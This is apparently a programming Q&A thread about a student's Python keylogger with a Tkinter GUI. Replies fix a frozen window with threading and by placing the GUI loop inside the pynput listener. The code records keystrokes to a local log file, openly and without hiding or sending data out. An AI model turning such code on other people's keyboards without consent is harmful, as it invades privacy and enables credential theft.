# Errors with Tkinter and Keylogger

Tags: python, tkinter, keylogger

I am trying to write a keylogger program for a school project and am getting errors with;

1. When writing to the txt file the spaces do not work so all the text is together.
2. I am unable to get the GUI to load, I am using Tkinter and even when I got it to work it would freeze and crash after starting.
   If there is any fix or help it would be greatly appreciated. Here is my code:

```
# Keylogger Program Using Pynput

# Imports
from tkinter import *
import os
from pynput.keyboard import Key, Listener
import pynput

from keylogger import on_press, on_release

count = 0
keys = []


def start_keylogger():

    # For every 5 keys pressed the log will update, this value can change.
    def on_press(key):
        global keys, count

        keys.append(key)
        count += 1
        print("{0} pressed".format(key))

        if count >= 2:
            count = 0
            write_file(keys)
            keys = []

    # Making the log file more readable.
    def write_file(keys):
        with open("log.txt", "a") as f:
            for key in keys:
                k = str(key).replace("'", "")
                if k.find("space") > 0:
                    f.write(" ")
                elif k.find("Key") == -1:
                    f.write(k)

    # To exit/stop the keylogger.
    def on_release(key):
        if key == Key.esc:
            return False

    # For the keylogger itself.
    with Listener(on_press=on_press, on_release=on_release) as listener:
        listener.join()


def open_log():
    ff = open("log.txt", "r")
    print(ff.read())

# Simple GUI
# Creating the window
# Modifying the window


root = Tk()
root.title("Keylogger")
root.geometry("300x300")
root.configure(bg="#808080")

# Title
theLabel = Label(root, text="Krish's Keylogger.", bg="#808080")
theLabel.pack()

# Button 1 to start the keylogger.
button1 = Button(root, text="Start", bg="#059CF0", fg="white", command=start_keylogger)
button1.pack(fill=X)

# Button 2 to open the log file.
button2 = Button(root, text="Open Log", bg="#059CF0", fg="white", command=open_log)
button2.pack(fill=X)

# Button 3 to end the keylogger.
button3 = Button(root, text="Exit", bg="#059CF0", fg="white", command=root.quit)
button3.pack(fill=X)

# Status Bar
status = Label(root, text="Currently doing nothing!", bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)

root.mainloop()
```

Thank you!

Comment: I think that the problem is in the `listener.join()` line. It blocks python's code execution and doesn't allow `tkinter` to update itself. THat is why the window becomes unresponsive.

Comment: @TheLizzard How should I fix that, what should I use/do instead of using the ```listener.join()```?

Comment: it would probably be very easy to just use `threading`

Comment: Why don't you put that in another thread. It should work since you don't use any tkinter object in `start_keylogger`. In the future if you have any calls to tkinter, it can get complicated. Sometimes `tkinter` crashes if you try accessing it from multiple threads

Comment: @TheLizzard I tried following threading from this website, https://www.geeksforgeeks.org/how-to-use-thread-in-tkinter-python/ however I was unable to get it to work. Would it possible to explain it/show how it works please? I apologise if I do not understand, I am still relatively new to coding with Tkinter and Pynput.

Answer (score 1, accepted):

Try something like this:

```py
from tkinter import *
from threading import Thread
import time


def _start_keylogger():
    # I am replacing all of the keylogger code with a `time.sleep`
    time.sleep(10)

def start_keylogger():
    new_thread = Thread(target=_start_keylogger, daemon=True)
    new_thread.start()

root = Tk()
root.title("Keylogger")
root.geometry("300x300")
root.configure(bg="#808080")

# Title
theLabel = Label(root, text="Krish's Keylogger.", bg="#808080")
theLabel.pack()

# Button 1 to start the keylogger.
button1 = Button(root, text="Start", bg="#059CF0", fg="white",
                 command=start_keylogger)
button1.pack(fill="x")

# Button 2 to open the log file.
button2 = Button(root, text="Open Log", bg="#059CF0", fg="white",
                 command=None)
button2.pack(fill="x")

# Button 3 to end the keylogger.
button3 = Button(root, text="Exit", bg="#059CF0", fg="white", command=root.quit)
button3.pack(fill="x")

# Status Bar
status = Label(root, text="Currently doing nothing!", bd=1, relief="sunken",
               anchor="w")
status.pack(side="bottom", fill="x")

root.mainloop()
```

I use `new_thread = Threading(target=..., daemon=True)` to create the new thread then `new_thread.start()` to start the thread. Please note that I replaced all of the keylogging code with `time.sleep` because I don't have that library installed.

Comment: I tried this and I'm still not getting the Tkinter GUI, I also tried it without the ```Listerner``` and it still did not work.

Comment: @Krish Are you getting any errors? If not, I have no idea what might be wrong. The code I provided works for me. It shouldn't have any problems with your keylogger code.

Comment: @Krish Does the keylogger or tkinter not work?

Comment: I am using the same code you have provided but instead of ```time.sleep``` I am using ```print("Hello")``` and am not getting any GUI from Tkinter

Comment: I ran your code without changing anything, it works, I am going to change it to include my keylogger code, hopefully it works!

Comment: Wow! It works! Thank you so much. I also removed ```from keylogger import on_press, on_release``` as for some reason it would not run with it, even though it was not being used. Everything works however if I wanted to open the log while with the second button would I have to create another thread and is the code for opening the txt file correct from the first code I provided? Thank you very much!

Answer (score 1):

You have to put code inside listener

```
with Listener(on_press=on_press, on_release=on_release) as listener:

     # ... your code with GUI ...
     # ... or at least `root.mainloop()

     listener.join()
```

Or you can write it little different but maybe better to understand it.

```
listener = Listener(on_press=on_press, on_release=on_release)
listener.start()

# ... your code with GUI ...
# ... or at least `root.mainloop()`

listener.stop()    
listener.join()
```

---

`Listener` already uses `thread` to run its code (and this is why it uses `.join()` like `thread`) and there is no need to put it in another thread.

There is [source code](https://github.com/moses-palmer/pynput/blob/master/lib/pynput/_util/__init__.py#L86) for `class AbstractListener(threading.Thread)` which later is used to create `keyboard.Listener` and `mouse.Listener`. In this code in comment you can also see how to use it with `start`, `stop` and try/except.

Comment: Why do you have `.join` after `.stop`? Doesn't the `.stop` stop the thread and make the `.join` useless/raise an error?

Comment: @TheLizzard `.stop()` only ask thread to stop running but it may still running (close and clear elements, etc,) and `join()` waits for real end.

Comment: Wouldn't the `.join` still block `tkinter`'s `mainloop`? I'm not very familiar with the `pynput` library and I have no idea how it works.

Comment: @TheLizzard - `tkiner` mainloop` has to be inside `listener` - between `start` and stop` - and `join` will be after `mainloop1 so it will not stop it.

Comment: Oh that makes more sense. Thanks for the info.

Comment: @TheLizzard ad it is build on top of `threading` - `class Listener(threading.Thread)`

Comment: @TheLizzard there is [source code](https://github.com/moses-palmer/pynput/blob/master/lib/pynput/_util/__init__.py#L86) for `class AbstractListener(threading.Thread)` which later is used to create `keyboard.Listener` and `mouse.Listener`. In this code in comment you can also see how to use it with `start`, `stop`

Comment: Thanks I will look at the source code but it defines a class inside a class and a function inside a function inside a function. It will take a bit of time for me to wrap my head around all of that

Comment: This is definitely very advance for me but it seems very interesting! I will definitely come back to this in the future! Thank you very much!

Comment: at this moment problem needs only `root.mainloop()` between `with Listener(...) as listener` and `listener.join()`. There is no need to read source code :)